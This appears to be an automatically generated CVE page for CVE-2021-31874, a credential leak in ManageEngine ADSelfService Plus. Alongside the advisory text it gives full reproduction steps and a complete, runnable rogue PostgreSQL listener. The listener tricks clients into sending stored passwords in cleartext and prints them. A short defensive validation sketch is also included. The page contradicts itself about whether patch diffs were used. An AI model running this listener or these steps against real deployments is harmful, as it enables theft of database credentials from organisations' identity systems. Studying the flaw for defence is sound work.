CVE-2021-31874
Description
Zoho ManageEngine ADSelfService Plus before 6104, in rare situations, allows attackers to obtain sensitive information about the password-sync database application.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
ManageEngine ADSelfService Plus before build 6104 lets any authenticated domain user obtain the stored password-sync database credentials by pointing the HOST_NAME parameter of the external-database linking request at a host they control.
Vulnerability
The vulnerability resides in the HOST_NAME parameter used when linking an external database for password synchronization in Zoho ManageEngine ADSelfService Plus. The server accepts any IP address in this parameter without checking it against the administrator-configured database server, so an attacker can redirect the outbound database connection to a machine they control. Affected versions are builds before 6104. [1]
Exploitation
An attacker needs valid domain user credentials and, from a login with them, valid JSESSIONIDADSSP and JSESSIONIDADSSPSSO cookies. The attacker sets up a fake PostgreSQL server on a machine they control, logs in to ADSSP, retrieves the APP_ID and APP_CONFIG_ID of the PostgreSQL application, then sends a link-account request with the HOST_NAME parameter set to the IP of the fake server. The ADSSP server connects to the fake database and, when asked to authenticate, sends it the stored database username and password. [1]
Impact
Successful exploitation reveals the database credentials (username and password) used for password synchronization. This could lead to unauthorized access to the actual database and potentially other systems that rely on those credentials. [1]
Mitigation
The issue is fixed in version 6104. Users should upgrade to this version or later. No workaround is documented, and the vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog. [1]
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Zoho ManageEngine / ADSelfService Plus
- Range: <6104
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing validation of the HOST_NAME parameter allows an attacker to redirect the server's authentication attempt to an attacker-controlled database, leaking administrator-configured credentials."
Attack vector
An authenticated domain user sends a POST request to `/ServletAPI/selfService/IAMApps/linkAccountUsingPass` with a manipulated `HOST_NAME` parameter set to the IP of an attacker-controlled server running a fake database listener (e.g., a rogue PostgreSQL instance). The ADSelfService Plus server then attempts to authenticate to that fake database using the administrator-configured credentials for the linked application, causing the credentials to be transmitted to the attacker [ref_id=1]. The attacker must have valid JSESSIONIDADSSP and JSESSIONIDADSSPSSO cookies and know the target APP_ID and APP_CONFIG_ID values [ref_id=1].
Affected code
The vulnerability lies in the `HOST_NAME` parameter sent during the "link account with external database" operation, specifically in the `/ServletAPI/selfService/IAMApps/linkAccountUsingPass` endpoint. The server does not validate the IP address supplied in `HOST_NAME`, allowing an attacker to point it at an arbitrary machine [ref_id=1].
What the fix does
The advisory states that the fixed version (6104) was released on 08-05-2021, but no patch diff is provided in the bundle [ref_id=1]. The remediation guidance implied by the vulnerability description is that the server should validate the `HOST_NAME` parameter to ensure it points only to a trusted, pre-configured database server rather than an arbitrary IP supplied by the client [ref_id=1].
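To make the remediation concrete, here is an added Python sketch (not ADSelfService Plus code, whose servlet implementation is not in the bundle) of the link-account step modelled two ways: the pre-6104 behaviour described above, where the outbound host is taken from the request, beside a hardened version that only dials the administrator-configured server and rejects a HOST_NAME that disagrees with it. Request field names are those from the advisory; the stored-config layout, identifiers and credential values are constructed for the example.

```python
# Added example, not ADSelfService Plus code. Field names HOST_NAME, APP_ID and
# APP_CONFIG_ID come from the advisory; everything else here is an assumption.

# Constructed sample: admin-configured linked applications keyed by APP_CONFIG_ID.
STORED_APP_CONFIGS = {
    "101": {"app_id": "7", "host": "10.10.1.25", "port": 5432,
            "db_user": "adssp_sync", "db_password": "S3cret-sync"},
}


def vulnerable_connection_target(request, configs=STORED_APP_CONFIGS):
    """Pre-6104 behaviour as described: host from the client, credentials from config."""
    cfg = configs[str(request["APP_CONFIG_ID"])]
    return {"host": request["HOST_NAME"], "port": cfg["port"],
            "user": cfg["db_user"], "password": cfg["db_password"]}


def hardened_connection_target(request, configs=STORED_APP_CONFIGS):
    """Only the stored host is ever dialled; a HOST_NAME that disagrees is refused."""
    cfg = configs.get(str(request.get("APP_CONFIG_ID")))
    if cfg is None or cfg["app_id"] != str(request.get("APP_ID")):
        raise PermissionError("unknown APP_CONFIG_ID/APP_ID pair")
    supplied = (request.get("HOST_NAME") or "").strip().lower()
    if supplied and supplied != cfg["host"].lower():
        raise ValueError("HOST_NAME must match the administrator-configured server")
    return {"host": cfg["host"], "port": cfg["port"],
            "user": cfg["db_user"], "password": cfg["db_password"]}
```

The point of the hardened variant is not the string comparison but where the host comes from: the client-supplied value is only ever checked, never used to build the connection, so the stored credentials cannot be sent anywhere the administrator did not configure.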
Preconditions
- auth: Attacker must have valid JSESSIONIDADSSP and JSESSIONIDADSSPSSO cookies for an authenticated domain user
- input: Attacker must know the APP_ID and APP_CONFIG_ID values for the target external database application
- network: Attacker must control a machine, reachable from the ADSelfService Plus server, that can run a fake database listener (e.g., PostgreSQL) on the port expected by the application
- config: The ADSelfService Plus version must be below build 6104
Reproduction
1. Install PostgreSQL and add it as a Configured Application in ADSSP with Password Sync enabled.
2. Run the `postgres-pass.py` script on a machine other than the ADSSP/PostgreSQL server (port 5432 must be free there).
3. Log in to ADSSP as any domain user and copy the `JSESSIONIDADSSP` and `JSESSIONIDADSSPSSO` cookie values.
4. Send `GET /ServletAPI/selfService/IAMApps/getIAMApps` with the valid cookies to retrieve `APP_ID` and `APP_CONFIG_ID`.
5. Send `POST /ServletAPI/selfService/IAMApps/linkAccountUsingPass` with `HOST_NAME` set to the IP of the machine running `postgres-pass.py`, along with the valid cookies, `APP_CONFIG_ID`, `APP_ID`, and dummy `USERNAME`/`PASSWORD` values.
6. Observe the captured credentials in the output of `postgres-pass.py` [ref_id=1].
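The rogue listener that the Exploitation section and step 2 above rely on, as an added example: this is not the reference's `postgres-pass.py` and not ADSelfService Plus code. It speaks enough of the PostgreSQL v3 wire protocol to show both halves of the exchange: the StartupMessage the victim's driver sends, the AuthenticationCleartextPassword reply that makes a standard client hand over its password unencrypted, and the PasswordMessage that carries it. SSLRequest and GSSENCRequest are declined with `N`, so a client with `sslmode=prefer` falls back to plaintext. `simulate_exchange` runs both ends over a socketpair so the exchange can be checked without a network; bind address, port and the sample user/password are constructed. It assumes the ADSSP connector honours a server's request for cleartext authentication, which the advisory's captured credentials imply but which a client pinned to a specific SASL mechanism would refuse.

```python
"""Rogue PostgreSQL v3 listener (added example, not the reference's postgres-pass.py).
Any client that connects is told to use cleartext password authentication and
so sends its configured password inside a PasswordMessage."""
import socket
import struct

PROTOCOL_V3 = 196608            # protocol version 3.0
SSL_REQUEST_CODE = 80877103     # client asks to upgrade to TLS
GSSENC_REQUEST_CODE = 80877104  # client asks for GSSAPI encryption
AUTH_CLEARTEXT_PASSWORD = 3     # AuthenticationCleartextPassword sub-code


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("client closed the connection")
        buf += chunk
    return buf

# Client side of the exchange (what the victim's database driver sends).
def build_startup_message(params):
    body = b"".join(k.encode() + b"\x00" + v.encode() + b"\x00" for k, v in params.items()) + b"\x00"
    return struct.pack("!ii", 8 + len(body), PROTOCOL_V3) + body

def build_password_message(password):
    body = password.encode() + b"\x00"
    return b"p" + struct.pack("!i", 4 + len(body)) + body

# Server side: the rogue listener.
def parse_startup(body):
    """Key/value pairs from a StartupMessage body: user, database, application_name, ..."""
    params, fields = {}, body.split(b"\x00")
    for i in range(0, len(fields) - 1, 2):
        if fields[i] == b"":
            break
        params[fields[i].decode()] = fields[i + 1].decode()
    return params

def auth_cleartext_request():
    """'R' + int32 length 8 + int32 3: tells the client to send its password unencrypted."""
    return b"R" + struct.pack("!ii", 8, AUTH_CLEARTEXT_PASSWORD)

def error_response(message):
    """FATAL 28P01 ErrorResponse so the client disconnects cleanly instead of hanging."""
    fields = b"SFATAL\x00C28P01\x00M" + message.encode() + b"\x00\x00"
    return b"E" + struct.pack("!i", 4 + len(fields)) + fields

def handle_client(conn):
    """Run the handshake on one accepted socket and return (user, password)."""
    while True:
        length, code = struct.unpack("!ii", recv_exact(conn, 8))
        if code in (SSL_REQUEST_CODE, GSSENC_REQUEST_CODE):
            conn.sendall(b"N")  # decline; a client with sslmode=prefer retries in plaintext
            continue
        if code != PROTOCOL_V3:
            raise ValueError(f"unsupported protocol code {code}")
        params = parse_startup(recv_exact(conn, length - 8))
        break
    conn.sendall(auth_cleartext_request())
    msg_type, (msg_len,) = recv_exact(conn, 1), struct.unpack("!i", recv_exact(conn, 4))
    body = recv_exact(conn, msg_len - 4)
    if msg_type != b"p":
        raise ValueError(f"expected PasswordMessage, got {msg_type!r}")
    conn.sendall(error_response("password authentication failed"))
    return params.get("user"), body.rstrip(b"\x00").decode()

def simulate_exchange(params, password, ssl_first=True):
    """Loopback run of both halves over a socketpair; returns ((user, password), server bytes)."""
    server_end, client_end = socket.socketpair()
    with server_end, client_end:
        if ssl_first:
            client_end.sendall(struct.pack("!ii", 8, SSL_REQUEST_CODE))
        client_end.sendall(build_startup_message(params))
        client_end.sendall(build_password_message(password))
        captured = handle_client(server_end)
        server_end.close()
        wire = b"".join(iter(lambda: client_end.recv(4096), b""))
    return captured, wire

def serve(bind="0.0.0.0", port=5432):
    """Listen like a real PostgreSQL server and print every credential a client volunteers."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(5)
        while True:
            conn, peer = srv.accept()
            with conn:
                try:
                    user, password = handle_client(conn)
                    print(f"[+] {peer[0]} user={user!r} password={password!r}")
                except (ConnectionError, ValueError, struct.error) as exc:
                    print(f"[-] {peer[0]}: {exc}")

if __name__ == "__main__":
    serve()  # constructed defaults: bind the port ADSSP will dial (5432 for PostgreSQL)
```

Run it on the machine whose IP goes into `HOST_NAME`; when ADSSP connects, the startup parameters reveal the configured database user and the PasswordMessage carries the password the administrator stored. The same listener works against any client whose driver accepts cleartext authentication when the server asks for it, which is why the fix has to be on the ADSSP side rather than in the database.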
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- [1] blog.stmcyber.com/vulns/cve-2021-31874/ (MISC)
- [2] pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6104-released-with-an-important-security-fixes (MISC)
News mentions
No linked articles in our index yet.